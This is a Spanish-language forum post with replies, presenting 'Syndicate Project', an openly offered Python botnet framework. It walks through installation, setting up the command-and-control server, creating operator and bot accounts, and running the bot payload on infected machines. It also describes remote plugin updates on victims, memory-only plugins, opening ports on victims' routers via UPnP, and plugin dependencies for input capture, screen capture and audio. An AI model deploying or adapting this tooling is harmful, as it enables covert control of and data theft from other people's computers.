Syndicate Project: ¿Me compartes tu Botnet? - Parte #1

Iniciado por DtxdF, Noviembre 28, 2019, 01:49:48 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Noviembre 28, 2019, 01:49:48 AM Ultima modificación: Diciembre 03, 2019, 06:00:22 PM por DtxdF
Syndicate Project



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Syndicate Project es un proyecto que te simplifica la creación de botnet's, totalmente escrito en Python (3); así es, puedes crear cientos o miles.

Plataformas:


  • Lamentablemente sólo la probé en Kali linux, pero puede experimentar en otras plataformas.
  • Recomiendo que si usted va a probar Syndicate en Windows, use Cygwin o WSL, aunque no le garantizo nada.
  • En Android técnicamente debería funcionar con Userland, aunque Tmux no es mala elección.

Instalación:

Primero clonamos el repositorio:

Código: bash
git clone https://github.com/DtxdF/Syndicate
cd Syndicate


Y luego instalamos los...

Requerimientos:

Puede optar por una fácil instalación con PIP, pero hay algunos inconvenientes que dependen de usted

En primer lugar, lo que si es necesario ejecutar es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:

Código: bash
python3 -m pip install -r requirements/requirements.txt


En el archivo podemos encontrar:

Código: text
PySocks==1.7.1
pycryptodome==3.9.4
PyYAML==5.1.2
pager==3.3
requests==2.22.0
urllib3==1.25.7
certifi==2019.9.11
chardet==3.0.4
idna==2.8
pyperclip==1.7.0


Estos son los requerimientos para que funcione lo más principal de Syndicate, mientras que para los complementos se tendría que seguir los siguientes pasos, no obstante no es necesario instalar para las funcionalidades anteriormente mencionadas, esto sirve para aumentar el poder...

Código: bash
python3 -m pip install -r requirements/requirements.complements.txt


En el archivo podemos encontrar:

Código: text
requests==2.22.0
pynput==1.4.5
six==1.13.0
python-xlib==0.25
pygame==1.9.6
mss==4.0.3


Un último requerimiento para los complementos predeterminados sería "PyAudio", pero esto requiere un poco más de su colaboración:

En el caso de Windows:

Seleccioné la versión correspondiente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso es: PyAudio‑0.2.11‑cp37‑cp37m‑win32.whl

Mientras que en Linux:


Código: bash
sudo apt-get install libasound-dev portaudio19-dev libportaudio2 libportaudiocpp0
sudo apt-get install ffmpeg
sudo pip install PyAudio==0.2.11


Usted se estará preguntado: ¿Windows?, ya mencionaste que sólo funciona en Linux, Claro, estos requerimientos son para los complementos dependiendo del SO a atacar.

Una vez hecha la instalación, vamos con lo bueno...

Importante:

Antes de continuar quiero aclarar unas cosas...

En Syndicate Project prefiero tener sinonimos para algunas cosas:


  • Evie: El servidor root; centro de comando y control; servidor inicial o nodo inicial
  • Rook: El bot cliente
  • Jacob: El administrador que mantiene al Rook
  • Administrador del servidor: Es el que se encarga de crear, asignar privilegios, configurar y mucho más, para un correcto funcionamiento

Caracteristicas:

Tratare de englobar todas las caracteristicas posibles de Syndicate, espero no me falte nada :)...


  • Mutiples conexiones a la vez
  • Cifrado hibrido en las conexiones. Usando AES256 y RSA a nuestro favor podremos cifrar nuestras comunicaciones oficiales entre Evie's (Servidor), Jacob's (Ciente-Administrador de los Rook's) y Rook's (Cliente-bot).
  • Cifrado simétrico en las bases de datos, tanto de Evie, como la de los rook's. Aunque en los accesos públicos también se usá el mismo esquema.
  • Red punto a punto. La red de los Rook's, no es igual a la de los Evie's, aunque puede haber comunicación entre ellas.
  • Multi-usuario. El administrador del servidor se encarga de crear tanto usuarios Jacob's cómo Rook's con sus respectivos privilegios.
  • Compartir Rook's (Bot's) entre Evie's (Servidores). -Cómo una red social :D-
  • Comunicación por nodos o lo que quiere decir, que creando una red entre Evie's puede hacer pasar cada paquete a una dirección o podría decirse nodos intermedios hasta llegar a un punto final o nodo final (Que vendría siendo otro Evie). La red está diseñada para que no se pueda saber que dirección envío qué y dónde, exceptuando algunas cosas que ya explicaré después y además se tiene que configurar toda la red manualmente; eso brinda más seguridad.
  • Uso de proxies para mayor privacidad (Tanto en los Evie's, Rook's y Jacob's).
  • Sistema antí-fuerza bruta. Es relativo. Relativo según las configuraciones que ejerce el administrador y el mismo usuario. porque el administrdor decide cómo Evie, va a bloquear a un usuario, cuándo y porqué. Dejaré la explicación más adelante.
  • Los complementos se pueden actualizar de forma transparente o lo que quiere decir, que sí tenemos una máquina infectada podremos cambiar el código desde el servidor y ejecutarlo en la máquina correspondiente.
  • Además del cifrado que viene incorporado, podemos agregarle una capa más con https
  • Puedes crear tu propia forma de comunicarte, por lo tanto tiene dinamismo.
  • Los complementos le temen al disco duro, prefieren quedarse en memoria.
  • En el lado de los rook's podemos hacer que el router de la victima abra un puerto con UPnP (Sí está disponible)

Nota: Los privilegios sólo son válidos para los Jacob's

Tipos de configuración


  • Configuración Dinámica: Este tipo de configuración puede cambiar en plena ejecución de Evie dependiendo de lo que haga el administrador del servidor.
  • Configuración Estática: También se puede llamar configuración global, porque en la mayoría de utilidades, herramientas y todo lo que tenga que ver con Syndicate la utiliza; además esta no cambia en plena ejecucion.

Tipos de usuario

En Syndicate Project trato de implementar diferencias entre usuarios para simplificar las explicaciones; en el proyecto se puede encontrar cuatro tipos de usuario:


  • Administrador del servidor: El administrador del servidor es una pieza obligatoria para armar el tablero. Éste se encarga de crear, configurar, manejar y mucho más, de lo que tenga que ver con el funcionamiento interno de Syndicate.
  • Jacob: Él es el cliente-administrador de los rook's. Jacob podrá controlar tantos rook's cómo el Administrador del servidor desee.
  • Rook: El cliente-bot que se encarga de hacer lo que le pida Jacob
  • Public: Yo no diría que es un usuario en sí, se podría decir que es un cliente que quiere usar nuestros servicios públicos. Entre los cuales están:


    • getPubKey: Obtener la Clave Pública de Evie; Puede tener muchos fines esta operación, pero la más importante es cuando compartirmos un rook.
    • saveData: Guarda los datos de perfil del rook
    • resend: Re-envía datos a otro nodo, tanto un nodo final como podría ser un nodo intermedio
    • sendSOS: Comunicación estilo correo electrónico entre Evie's (Incluso envío de archivos)

Nota: Los servicios públicos se pueden bloquear desde el archivo de configuración dinámico

Aclaraciones:

Tengo que explicar algunas cosas que iré mencionando poco a poco a lo largo de este documento:


  • Redirector: Es un Rook que pasa hacer un servidor (No un Evie) dentro de la máquina infectada; consiste en crear un servidor capaz de recibir datos, almacenarlos en una base de datos cifrada dentro de la misma máquina victima, para que luego el administrador del servidor, pueda conectarse, descargar los datos y simular ser Evie, con el único fín de obtener un resultado y enviarselo a un rook de forma transparante o como si no fuera sucedido nada.

    El redirector es buena opción, cuando deseas crear un "Backup" dentro de las máquinas infectadas ¿Por qué?, ¿Te imaginas que tu servidor central cayera? y luego cuando lo vuelvas a levantar ya es muy tarde, no tienes como recuperar la perdida de datos; hay es cuando entra redirector al rescate. Claro que necesitas abrir un puerto en el corta fuegos de la victima. Syndicate se encarga de crear la conexión, tú te encargas de todo lo demás.
  • Hash dinámico: En syndicate se usa un Hash dinámico, para hacer todo lo posble para evitar un ataque de fuerza bruta o por diccionario, usando iteraciones, Número de seguridad, Número de disminución y Caracteres de seguridad; todo esto tiene que ver con el algoritmo utilizado, pero haciendo una aclaratoria:

    • Iteraciones: Las iteraciones son el número de veces que se repite el proceso.
    • Número de seguridad: El número de seguridad se multiplica primero por el mismo y el resultado se usa para delimitar la ofuscación de caracteres de seguridad y luego en la siguiente iteración (Si es que la hay) disminuye usando el número de disminución.
    • Número de disminución: El número de disminución se encarga de disminuir el número de seguridad por cada segunda iteración.
    • Caracteres se seguridad: Los caracteres de seguridad se codifican a base64 y se "parten" y ofuscan usando el número de seguridad y disminución, para luego sumarlos con el resultado verdadero, que quiere decir, el hash.

    Nota: El hash usa la siguiente función: sha256( sha512( string ).digest() ).hexdigest()
  • Token de Acceso: Usado para verificar que tenga acceso público al sistema y cifrar los datos, posteriormente se usaría algún servicio antes mencionado.
  • Clave secreta: La clave secreta cifra algunos datos (Cómo la dirección URL de los nodos) antes de usar "resend" o un reenvio de paquetes en una red, porque que si llega a hacer interceptada, no se pueda "leer" esos datos, por eso su nombre, ésta sólo se debe compartir con las personas de confianza, igual que pasa con el token de acceso.
  • Clave única: La clave única es una clave generada aleatoriamente en la creación de un nuevo Jacob, es importante darsela al administrador correspondiente, porque gracias a ella puede acceder.

    La clave única cada vez que inicie sesión, cambiará, eso es para mantener aún más seguro la estructura.
  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta: Quiero aclarar, a pesar de que la aplicación No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es la que interectua con el servidor, no es más que una simple herramienta de pruebas, el conejo debajo del sombrero enrealidad es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta; mientras que para controlar a los rook's sería No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en este caso es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Hablare de ésto, en otra sección.

Notas:

  • Tú, como administrador del servidor te debes encargar de repartir a personas de confianza el token de acceso, claro sí es qué desean usar los servicios públicos. No es aplicable si es un Jacob y tiene el permiso getToken, porque la puede obtener sin necesidad de perdirla.
  • El token de acceso se tiene que usar mayormente para Compatir un rook o usar resend.
  • En el caso de usar resend, tiene que usar además del token de acceso, la clave secreta.
  • Prefiero que usted usé No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y se comunique con el Evie que desee, para que tenga más seguridad en sus datos y sin limitaciones por parte de servidores externos. Aclaro ésto, porque así es la mejor manera de enviar claves secretas de forma segura. Hay otras alternativas, pero es bueno que uno mismo sea el propio servicio y no depender de otros.
  • Tenga absoluto cuidado con los números y caracteres de seguridad, pueden volver el proceso más lento, pero eso no es tan malo, porque si un atacante quiere hacer fuerza bruta, tiene que esperar a que el servidor genere el hash y luego verificar si es correcto o no. ¿Una maravilla no? :')
  • Sí quieres saber más acerca del algoritmo, puedes hacerlo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Funcionamiento de la Red:

Algunas veces es mejor dejar una simulación en vez de palabras, por lo tanto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, podrá encontrar el cómo sería la red con todas las caracteristicas y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el cómo sería cuando Jacob envía datos a través de varios nodos en diferentes países.

Nota: Aunque en esta demostración no explico como es el proceso en que se usan los datos encriptados, en la practica si pasa éso.

Ahora pasemos a la explicación: Es sencilla la red, hay que saber usarla y cuándo, pero para poder entenderla hay que crear desde un principio lo que necesitamos e ir aumentando a medida que vayan incrementando los conocimientos.

Primero crearemos un Jacob (Administrador de los Rook's):

Pero antes de hacer éso, quiero aclarar que algunas herramientas necesitan acceso seguro a la base de datos que está encriptada, por lo tanto sí usted no introduce los parámetros se le va abrir un pequeño formulario requiriendo los datos. Sí no me cree, mirelo usted o mejor aún Pruébelo:


Código: text

./addadmin.py -u <Nombre de usuario> -p <Frase de contraseña> -P <Frase de contraseña de la clave privada>
* Datos para desencriptar la frase de contraseña *
  ----------------------------------------------

Ingrese la frase de contraseña:
: **************
Ingrese los caracteres de seguridad:
: abcdefghijklmnopqrstuvwxyz1234567890
Ingrese el número de iteraciones:
: 43
Ingrese el número de seguridad:
: 30
Ingrese el número de disminución:
: 18
Se guardo satisfactoriamente en -> conf/pass


Notas:


  • Lo que acabo de introducir se genera lento en mi computadora, usted tiene que introducir lo necesario para obtener una mayor seguridad pero que el proceso no se vuelva tan lento; al fin y al cabo usted decide.
  • Sí ejecutan alguna herramienta que requiera la información para desencriptar la base de datos, se guardará en vez de comparar en caso de que conf/pass no exista
  • Sí ejecutan alguna herramienta que requiera la información para desencriptar la base de datos, se guardará en vez de comparar en caso de que conf/pass no exista
  • conf/pass es guardado con permisos "444", por favor verifique que sea así con "ls -l conf/pass" o si no hagalo de forma manual: chmod 444 conf/pass una vez ha sido creada.


¿Ven?, sería tedíoso que tuviera que introducir todas esas cosas, mejor usamos los poderes de la linda terminal :'D:

Código: bash
# Primero veamos que regla estamos usando para guardar los comandos en el historial:
echo $HISTCONTROL
ignoreboth
# ¡Bien!, esa es la regla perfecta.
# Eso nos servirá para cuando introducimos un comando y no queramos que se guarde en el historial, ya que la idea es que no se registre una contraseña o algo sensible.
# Así que ahora guardemos lo que necesitamos en una variable
declare -x params='-db-passphrase <La frase de contraseña> -db-iterations <Iteraciones> -db-chars <Caracteres de Seguridad> -db-decrement-number <Número de disminución> -db-security-number <Número de seguridad>'
# Cómo pueden notar, usé un espacio antes de escribir el comando, para que no se almacene en el historial.
# Claro, pueden hacer éso o pueden crear un script y lo cargan usando "source" o ".", pero se los dejo para la casa...


Ahora simplemente puede ejecutar:

Código: bash
 ./addadmin.py -u <Nombre de usuario> -p <Frase de contraseña> -P <Frase de contraseña de la clave privada> $params


Código: text

-*- ¿Es correcta la siguiente información? -*-

Nombre de usuario       ::   <Nombre de usuario>
Frase de contraseña     ::   <Frase de contraseña>
Contraseña RSA          ::   <Frase de contraseña de la clave privada>
Iteraciones             ::   43
Número de seguridad     ::   30
Número de disminución   ::   18
Caracteres de seguridad ::   abcdefghijklmnopqrstuvwxyz1234567890
Privilegios             ::   ALL
Max. de bot's           ::   0 (infinito)
Tamaño de la clave      ::   2048
¿Root?                  ::   0
->


Debe introducir "1" para continuar o "0" para salir, aunque "CTRL-C", también ayuda.

Notas:


  • Sí no quiere que le confirme los datos, usé "-no-confirm".
  • Cómo puede observar, hay caracteres rellenados automáticamente, puede editarlos introduciendo los parámetros correspondientes cómo: "-i, --iterations" para las Iteraciones "-sn, --security-number" para el "número de seguridad", "-c, --security-chars" para los Caracteres de seguridad y "-d, --decrement-number" para el Número de disminución o puede editarlos en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
  • Ser root no es lo mismo en Linux que en Syndicate, no se confunda; significa que todos los rook's ahora pertenecerán a todos los jacob's que son root, aunque esto es relativo, ya que si el maximo de bot's es mayor a "0" no se incluirá si llegó a su maximo.
  • Puede usar el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para Syndicate, si desea saber cuanto puede durar la generación y la comparación de su Hash antes de salir al campo de batalla.

Esperamos unos instantes, y para confirmar que todo salío perfecto, ejecuté:

Código: bash
./addadmin.py -show $params



Ese comando le mostrará todos los Jacob's registrados.

Ahora pasemos a algo mejor. Creemos nuestro rook para un jacob:


Código: bash
 ./addbot.py -u <Nombre del rook> -p <Frase de contraseña> -P <Frase de contraseña de la clave privada> -a <Jacob/s> $params


Vemos un parámetro nuevo, "-a" o también podría llamarse "--admin". Si no razonaste correctamente, te digo que es para agregar a los Jacob's a el nuevo rook.

Notas:


  • Puedes crear tantos rook's para jacob's dependiendo del maximo de bot's
  • El parámetro "-a, --admin" es de tipo lista, lo que quiere decir que para agregar a más de uno, tienes que usar una "," (coma) y sí el nombre tiene espacios usa comíllas cómo apoyo. Ejemplo: --admin "usuario, soy un usuario, otro"

Eso no es todo, necesitamos configurar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta usando No tienes permitido ver los links. Registrarse o Entrar a mi cuenta mas los parámetros ya utilizados en anteriores herramientas.

Código: bash
./auto-config.sh $params


Usted vería cada Clave, Sub-Clave y Valor. Los segundos de duración por cada uno, varian dependiendo de sus recursos, esto se debe a que se está encriptado cada dato.

A pesar de que se muestre la configuración al finalizar, tal vez usted quiera apreciarla para un después. Lo puede hacer así:


./evie-config.py -print-configuration $params

Notas:


  • Aunque No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es un script, la herramienta que tiene el poder de hacer esta mágia es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero es mejor automatizar todo, para ahorrar tiempo.
  • Puede obtener más información del significado de las Claves, Sub-Claves y Valores desde el mismo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Ahora si que viene lo bueno

Ejecutamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para iniciar el servidor:


Código: bash
 ./evie.py -P <Frase de contraseña de la clave privada> $params


Sí ejecutamos por primera vez, verá algo así:

Código: text
(00:33:04 ~ 26/11/2019)[Evie:ADVERTENCIA]:---:!: El par de claves aún no son son generados ... generando ...
(00:33:04 ~ 26/11/2019)[Evie:PERSONAL]:------:+: Tamaño a generar: "2048"
(00:33:11 ~ 26/11/2019)[Evie:INFORME]:-------:*: El par de claves fueron generadas ...
(00:33:11 ~ 26/11/2019)[Evie:INFORME]:-------:*: Desencriptando ...
(00:33:12 ~ 26/11/2019)[Evie:INFORME]:-------:*: ¡Clave desencriptada!
(00:33:12 ~ 26/11/2019)[Evie:INFORME]:-------:*: Generando clave secreta ...
(00:33:12 ~ 26/11/2019)[Evie:PERSONAL]:------:+: Clave secreta generada -> b22f 34b4 1c48 b8dd dad3 dcfc d0b6 986d 081f 80f3 959d 3de0 1075 6ea1 dfc2 ad45
(00:33:12 ~ 26/11/2019)[Evie:INFORME]:-------:*: Generando un nuevo token de acceso ...
(00:33:12 ~ 26/11/2019)[Evie:PERSONAL]:------:+: Token de acceso generado -> 8502382584368ce06c336c793750815f400697daaff7dc8244e849b75135d638
(00:33:12 ~ 26/11/2019)[Evie:ADVERTENCIA]:---:!: No se encontraron los requerimientos necesarios para usar el protocolo de forma (más) segura. Usando HTTP ...
(00:33:12 ~ 26/11/2019)[Evie:PERSONAL]:------:+: Escuchando en :: http://0.0.0.0:8081/hmKReYEJrMWB8l48yvsENaLlMT1ijqIiU2nU6RGiKnanCZEkimT0lh2xW-xS1xYP6rJX1uWmxbp2bOeSVCCfJQ


No explicaré todo, porque hay cosas que son sencillas y otras ya las explique, pero sí que hay algo nuevo. ¿Qué deminios es esa ruta?; la ruta se genera de forma aleatoria y segura, puede usar los archivos de configuración para evitarlo, pero recomiendo que lo deje así.

Lo negativo de usar una ruta aleatoria es que si el servidor se "apaga" y se inicia nuevamente, tendrá otra ruta, lo que quiere decir que los Jacob's tendran que saberlo; es recomendable sólo cuando hay pocos Jacob's.

Ahora para que Evie tenga algún sentido en la vida, que tal si ejecutamos la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero antes quiero aclarar algo que tiene que ver con los complementos, aunque aún no me adentraré en aguas turbulentas, por ahora estamos en la orilla del mar (Eso es en otra sección). Prosigamos:

Tenemos que tener en cuenta que los complementos necesitan requerimientos, cosa que mencionaré en la instalación, aunqué podemos edítar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta del payload y remover o agregar lo que necesitemos.

Bien, una vez aclarado, necesitamos la Clave Pública de Evie y la Clave Privada del Rook; La obtenemos de la siguiente forma:


Código: bash
./show_server_keys.py $params | more
...
Clave Pública:
...
Clave Privada:
...


Usamos "more" para delimitar la salida y ver lo que necesitamos, la clave pública. La seleccionamos, copiamos y la guardamos en una ruta segura, cómo "/tmp":

Código: bash
nano /tmp/<Nombre de la clave pública> # Una vez abierto "nano" pegamos la clave pública y la guardamos
...


Hacemos el mismo procedimiento, pero esta vez será para la Clave Privada del Rook:

Código: bash
 ./addbot.py -show -option keys -P <identificador del rook>:<Frase de contraseña para desencriptarla> $params


Nota: Puede asignarle permisos de escritura y lectura dependiendo de su usuario al par de claves para mayor seguridad.

Recordatorio: Cómo ve, deje un espacio para que no se guarde el comando en el historial

Esta vez vemos nuevos parámetros con argumentos interesantes:



  • -show: Mostramos los usuarios disponibles.
  • -option: Usamos una clave especifica para ver algo especifico de la información del usuario. Podemos usar el parámetro "-h, --help" para ver la ayuda dónde también nos mostrara las claves que acepta.
  • -P: La frase de contraseña de la clave privada, siguiendo la siguiente sintaxis: <identificador del rook>:<Frase de contraseña para desencriptarla>

Buscamos el rook y la clave privada desencriptada, hacemos el mismo procedimiento que hicimos con la clave pública de Evie

Código: bash
nano /tmp/<Nombre de la clave privada> # Una vez abierto "nano" pegamos la clave privada y la guardamos
...


Ahora sí, ejecutemos el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: bash
./payload.py -b <Identificador del Rook> -pass <Frase de contraseña del Rook> -a <Dirección de Evie> -p <Puerto> -pub-key <Clave pública de Evie> -priv-key <Clave privada del Rook> -proto <Protocolo, puede ser http o https> -sleep-check <Intervalos en que se hace una petición para ver si hay comandos en cola> -db-path <El nombre de la base de datos> -db-pass <Frase de contraseña de la base de datos>


Explico poco a poco lo que siento que pueden tener dudas:


  • -sleep-check: Rook hace una petición a el/los servidor/es para verificar si algún Jacob propuso un comando en cola cada intervalo de segundo determinado
  • -db-path: Los rook's tienen bases de datos que se almacenan en el directorio temporal del sistema operativo (encriptada, por supuesto), si no especificamos un nombre se genera de forma aleatoria y si ejecutamos otra vez el payload tendremos otra ruta aleatoria, por éso, es mejor especificarla.
  • -db-pass: La frase de contraseña para cifrar la base de datos

Nota: Puede usar el parámetro "-no-verbose" para que no imprima el resultado de alguna operación

Esto es una prueba, por lo que todo se hará por la consola, ya hablare sobre como usar la programación a nuestro favor.

Necesitamos interactuar con el Rook para ello ejecutamos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Código: bash
./control.py $params


Puedes observar en las Las capturas de pantalla cómo se vería

Nota: Quiero aclarar que la aplicación es una DEMO, no es para entornos reales, por lo tanto no te sorprendas si no es igual de bonita que Vim ;).

Nos mostrara primero un panel de inicio de sesión, tenemos que rellenar los datos deacuerdo a lo aprendido

Al terminar de iniciar sesión lo primero que hará será enviar un comando "ping" para verificar si sus credenciales son correctas, luego enviara el comando "listBots" para obtener la lista de rook's que le pertenecen.

Sí ocurre un error puede ser por los siguientes motivos:



  • No tiene privilegios para listar rook's o ejecutar ping
  • Ingreso una ruta incorrecta
  • El servidor lo está bloqueando
  • El servidor no existe
  • Ingreso datos incorrectos
  • Faltan valores
  • No existe la clave pública o la clave privada

Eso es sólo unos cuantos motivos por lo que no podrá iniciar sesión, recuerde tiene que ingresarlos exactamente cómo se creó; exceptuando a iterations, porque si usted coloca un número mayor al verdadero pero los demás datos son correctos, no habrá problemas.

Sistema anti fuerza bruta:

El sistema anti fuerza bruta de Syndicate es sencillo, primero tendremos que comprender que es el Hash dinámico, cosa que ya explique en las aclaratorias.

En Syndicate al crear un usuario además de la información de perfil, existen algunos datos de seguridad, cómo son los Caracteres de seguridad, Número de seguridad, Número de disminución e Iteraciones; Los cuales su funcionamiento principal es generar un Hash. El hash puede tener el mismo dato (Como una contraseña), pero si se introduce cualquier dato diferente al resto de los datos de seguridad el Hash será diferente.

Mientras el proceso sea más lento, mejor en un buen sentido, ¿Por qué?, simplemente porque si un atacante quiere hacer fuerza bruta al servidor, obligatoriamente tiene que tener: El usuario, Frase de contraseña, Los datos de seguridad, La clave pública del servidor, la clave privada y la clave única inclusive.

De hecho otra cosa que es muy importante en cuanto a la seguridad es la Clave única que cambia cada vez que el Jacob al que le pertenece, inicia sesión.

Claro que eso no es todo, el atacante debe conocer la ruta del servidor que puede ser una aguja en un pajar.

Sumando todo esto, también nos vemos que en la configuración especificamente las claves honeypot y login vemos unas sub claves, como pueden ser:



  • Login:


    • max_retry: El maximo de intentos fallídos
    • retry_seconds: El tiempo de espera
    • denied_method: El método de denegación que pueden ser:
      • forIP: Bloquea a un usuario por dirección IP. Tiene sus pros y contras; entre sus pros puede ser que no es tan fastidioso, ya que si un atacante está bloqueado por dirección IP, nosotros (Los usuarios) podemos acceder cómo si no fuera pasado nada, pero entre sus contras, muy fácil de bypassear
      • forRetry: Bloquea a un usuario por el nombre en vez de la dirección IP. Es bueno porque así no se bypassea tan fácil, pero también nos bloquearía a nosotros.
  • honeypot: Si un dato coincide con lo requerido, se ejecuta una de estas operaciones:


    • user_agent_black_list: La lista para bloquear a un usuario por Agente de usuario
    • blacklist: La lista para bloquear a un usuario por Dirección IP
    • honeypot_list: En vez de bloquear ¿Qué tal si usaramos una herramienta cuando haya un coincidencia?; así es, por ejemplo podriamos usar nmap, cuando haya una coincidencia en la lista para escanear a ese usuario. *Necesitamos especificar las herramientas a usar en la clave tools *

Nota: También disponemos de expresiones regulares en todas las listas. Pueden ver más informacion en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¿Eso es todo?... ¡NO!. Si ingresamos por la URL del servidor en nuestro navegador, vemos que nos salta una autenticación le digo que ese es el panel de control web falso, es mera distracción 3:).

De hecho trato de simular Apache en la información que se pueda obtener. Puedes editar los valores en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y las plantillas en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


¿Segunda parte?

Lo mostrado anteriormente fue un poco de la documentación. Puede encontrar mucha más información acerca del proyecto, pero aún me falta mucho que redactar, así que poco a poco lo ire actualizando.

Respecto a la segunda parte tratara sobre cómo usar el proyecto para construir una Botnet Punto a Punto, cómo usar la red en cadena para comunicarse con otro Evie y está vez co-protagonizare esta pelicula con un compañero del foro .

Puede encontrar la documentación en mi repositorio, donde también podras descargar el proyecto: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Capturas de pantalla:

Inicio de sesión para los Jacob's:



Interactuando con un Rook:



Red en cadena:



Compartiendo un Rook:



Creador:

~ DtxdF (Jesús D. Colmenares)

Agradecimientos:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta: Gracias a tí, si estás leyendo ésto. Tú me ayudaste mucho con los complementos antes de que me surgiera la idea, es admirable que alguien dedique parte de su tiempo a escribir código a alguien que apenas sabe su nombre, pero mucho más a alguien que seguira aportando a este proyecto. Muchas gracias Kirari.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta: Gracias por aportar a la comunidad con su proyecto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, gracias a él, muchos complementos de Syndicate existen.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta: Creador de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, una pequeña pero poderosa libreria para hacer desastres con el router usando UPnP :D. Gracias por compartirlo y por dar vida a una caracteristica especial de los rook's

Sí hay alguien que me falta, comunicame inmediantamente

Extras:

Le prometí a un compañero del foro "AXCESS", que le dedicaría un *Gato*, por mera diversión:



*El gato de AXCESS reaccionando sobre el post*

~ DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

Estaba esperando este momento amigo @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, la verdad que increíble proyecto, sé que a los miembros de la comunidad les va a encantar  ;D

En cuanto pueda, aportaré más al mismo. Gracias también a nuestros otros dos colegas que nos ayudaron en proceso del mismo  :D :D

gran proyecto pero sobre todo grandes mentes
ҬӉЄ ӉѦСҠ ҒѺГСЄ Comunidad De Ciber-Seguridad En Todas Las Plataformas SaluDdos Mundo

Hack The Planet
Fuck The System

Diciembre 13, 2019, 11:14:26 AM #3 Ultima modificación: Diciembre 13, 2019, 11:31:03 AM por DtxdF
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes ni idea que significan esos 44 caracteres que escribiste, son de muchisimo apoyo, muchas gracias  ;D ;D ;D

Ya vendra muchisimo más ...

~ DtxdF
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF